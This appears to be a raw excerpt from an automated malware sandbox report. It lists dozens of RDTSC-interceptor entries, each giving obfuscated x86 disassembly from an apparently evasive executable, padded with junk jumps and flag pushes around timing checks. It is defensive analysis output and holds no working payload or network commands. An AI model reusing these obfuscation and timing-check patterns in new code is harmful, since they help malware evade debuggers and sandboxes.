Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54001F5 second address: 540024D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edi 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007F17B0FBC276h 0x0000000d or si, B258h 0x00000012 jmp 00007F17B0FBC26Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F17B0FBC276h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F17B0FBC26Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540024D second address: 5400253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400253 second address: 5400257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400257 second address: 5400276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1434h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400276 second address: 54002F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F17B0FBC276h 0x00000010 je 00007F1822AEA5DEh 0x00000016 jmp 00007F17B0FBC270h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 mov al, 59h 0x00000025 mov edi, 57EA8DEEh 0x0000002a popad 0x0000002b je 00007F1822AEA5CEh 0x00000031 jmp 00007F17B0FBC275h 0x00000036 mov edx, dword ptr [esi+44h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F17B0FBC26Dh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54002F0 second address: 5400328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 call 00007F17B0CB1439h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400328 second address: 5400388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0FBC26Ch 0x00000008 mov bx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edx, 61000000h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F17B0FBC26Ah 0x0000001b sbb cx, 4558h 0x00000020 jmp 00007F17B0FBC26Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F17B0FBC276h 0x0000002e add ah, FFFFFFB8h 0x00000031 jmp 00007F17B0FBC26Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400388 second address: 54003C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F18227DF709h 0x00000010 pushad 0x00000011 mov ax, BEADh 0x00000015 mov si, 98A9h 0x00000019 popad 0x0000001a test byte ptr [esi+48h], 00000001h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F17B0CB142Bh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F079B second address: 53F07BE instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0FBC276h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F07BE second address: 53F07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F07CD second address: 53F0840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F17B0FBC278h 0x00000015 sub cx, 1908h 0x0000001a jmp 00007F17B0FBC26Bh 0x0000001f popfd 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 push ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007F17B0FBC279h 0x00000030 or cl, FFFFFFD6h 0x00000033 jmp 00007F17B0FBC271h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0840 second address: 53F0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0850 second address: 53F0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0854 second address: 53F086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0CB142Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F086B second address: 53F08C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F17B0FBC276h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F17B0FBC271h 0x00000016 push esi 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 jmp 00007F17B0FBC26Dh 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F17B0FBC26Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F08C5 second address: 53F0905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F17B0CB1437h 0x00000017 jmp 00007F17B0CB1433h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0905 second address: 53F090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F090B second address: 53F090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F090F second address: 53F0942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC277h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0FBC272h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0942 second address: 53F097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F17B0CB1436h 0x00000010 je 00007F18227E6E4Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F17B0CB142Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F097D second address: 53F0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0981 second address: 53F0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0987 second address: 53F09A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09A6 second address: 53F09AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09AA second address: 53F09B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09B0 second address: 53F09F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 342A93B1h 0x00000008 mov si, B9EDh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, esi 0x00000011 jmp 00007F17B0CB1438h 0x00000016 je 00007F18227E6DF0h 0x0000001c pushad 0x0000001d mov si, B2CDh 0x00000021 pushad 0x00000022 mov ch, B0h 0x00000024 mov si, dx 0x00000027 popad 0x00000028 popad 0x00000029 test byte ptr [76FB6968h], 00000002h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09F8 second address: 53F09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, cl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09FF second address: 53F0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1437h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0A1A second address: 53F0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F1822AF1BE3h 0x00000011 pushad 0x00000012 mov bl, al 0x00000014 mov bx, 70ECh 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d mov ebx, 55AEF184h 0x00000022 pushfd 0x00000023 jmp 00007F17B0FBC26Dh 0x00000028 add esi, 23AA40C6h 0x0000002e jmp 00007F17B0FBC271h 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F17B0FBC26Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0A87 second address: 53F0B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0CB1437h 0x00000009 xor ax, 2CAEh 0x0000000e jmp 00007F17B0CB1439h 0x00000013 popfd 0x00000014 mov si, AD37h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F17B0CB1439h 0x00000023 push esi 0x00000024 pop edx 0x00000025 popad 0x00000026 mov cl, C9h 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F17B0CB142Fh 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F17B0CB1436h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov dx, AD94h 0x0000003b push edi 0x0000003c mov esi, 4D94C2DFh 0x00000041 pop eax 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 pushad 0x00000045 jmp 00007F17B0CB1431h 0x0000004a mov edx, esi 0x0000004c popad 0x0000004d push dword ptr [ebp+14h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007F17B0CB142Fh 0x00000058 mov edx, esi 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0B4D second address: 53F0B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC270h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0B61 second address: 53F0B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400983 second address: 540099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5480754 second address: 5480781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0CB142Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54708B9 second address: 54708C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54707CD second address: 54707DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410037 second address: 541003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541003B second address: 541003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541003F second address: 5410045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410045 second address: 541005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1432h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541005B second address: 541005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470AC0 second address: 5470B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 84h 0x00000005 pushfd 0x00000006 jmp 00007F17B0CB1438h 0x0000000b sbb cx, B148h 0x00000010 jmp 00007F17B0CB142Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov ecx, 3A1669DBh 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F17B0CB1433h 0x0000002b add esi, 086D0C3Eh 0x00000031 jmp 00007F17B0CB1439h 0x00000036 popfd 0x00000037 mov ebx, ecx 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470B3C second address: 5470B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470B4B second address: 5470BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f pushfd 0x00000010 jmp 00007F17B0CB1439h 0x00000015 jmp 00007F17B0CB142Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F17B0CB1435h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BAF second address: 5470BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BB5 second address: 5470BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0CB1435h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BE8 second address: 5470C1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 8C95B491h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 call 00007F17B0FBC275h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470C6B second address: 5470C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470C7A second address: 5470CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F17B0FBC279h 0x00000012 xor cx, 2D86h 0x00000017 jmp 00007F17B0FBC271h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F17B0FBC270h 0x00000023 add cx, 3028h 0x00000028 jmp 00007F17B0FBC26Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420309 second address: 5420326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420326 second address: 5420385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC26Ch 0x00000011 sbb esi, 49C786A8h 0x00000017 jmp 00007F17B0FBC26Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov si, BEB5h 0x00000022 mov si, 9131h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F17B0FBC279h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420385 second address: 5420389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420389 second address: 542038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542038F second address: 54203C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F17B0CB1430h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F17B0CB142Eh 0x00000017 mov si, DE61h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54203C9 second address: 54203E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 call 00007F17B0FBC26Ch 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54203E7 second address: 542041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 907Dh 0x00000007 jmp 00007F17B0CB142Ah 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f call 00007F17B0CB1429h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F17B0CB1437h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542041D second address: 542044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3521022Ah 0x00000008 jmp 00007F17B0FBC26Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17B0FBC274h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542044A second address: 54204D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F17B0CB1439h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F17B0CB1437h 0x0000001b adc ecx, 1EC0223Eh 0x00000021 jmp 00007F17B0CB1439h 0x00000026 popfd 0x00000027 mov eax, 7B114987h 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F17B0CB1438h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54204D5 second address: 54205BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F17B0FBC276h 0x0000000f call 00007F17B0FBC269h 0x00000014 pushad 0x00000015 mov dx, E0E0h 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F17B0FBC276h 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007F17B0FBC26Bh 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007F17B0FBC279h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jmp 00007F17B0FBC271h 0x00000039 pop eax 0x0000003a jmp 00007F17B0FBC26Eh 0x0000003f mov eax, dword ptr fs:[00000000h] 0x00000045 pushad 0x00000046 push ecx 0x00000047 pushfd 0x00000048 jmp 00007F17B0FBC26Dh 0x0000004d add ax, 9356h 0x00000052 jmp 00007F17B0FBC271h 0x00000057 popfd 0x00000058 pop eax 0x00000059 push ebx 0x0000005a pushad 0x0000005b popad 0x0000005c pop eax 0x0000005d popad 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F17B0FBC275h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205BA second address: 54205F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d jmp 00007F17B0CB142Eh 0x00000012 popad 0x00000013 sub esp, 1Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1437h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205F2 second address: 54205F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205F8 second address: 54205FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205FC second address: 5420680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F17B0FBC26Dh 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F17B0FBC26Ch 0x0000001f and ecx, 6BBBFEF8h 0x00000025 jmp 00007F17B0FBC26Bh 0x0000002a popfd 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F17B0FBC276h 0x00000032 sub esi, 56625958h 0x00000038 jmp 00007F17B0FBC26Bh 0x0000003d popfd 0x0000003e movzx eax, dx 0x00000041 popad 0x00000042 popad 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F17B0FBC26Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420680 second address: 542068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542068F second address: 54206BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17B0FBC26Dh 0x00000013 rdtsc
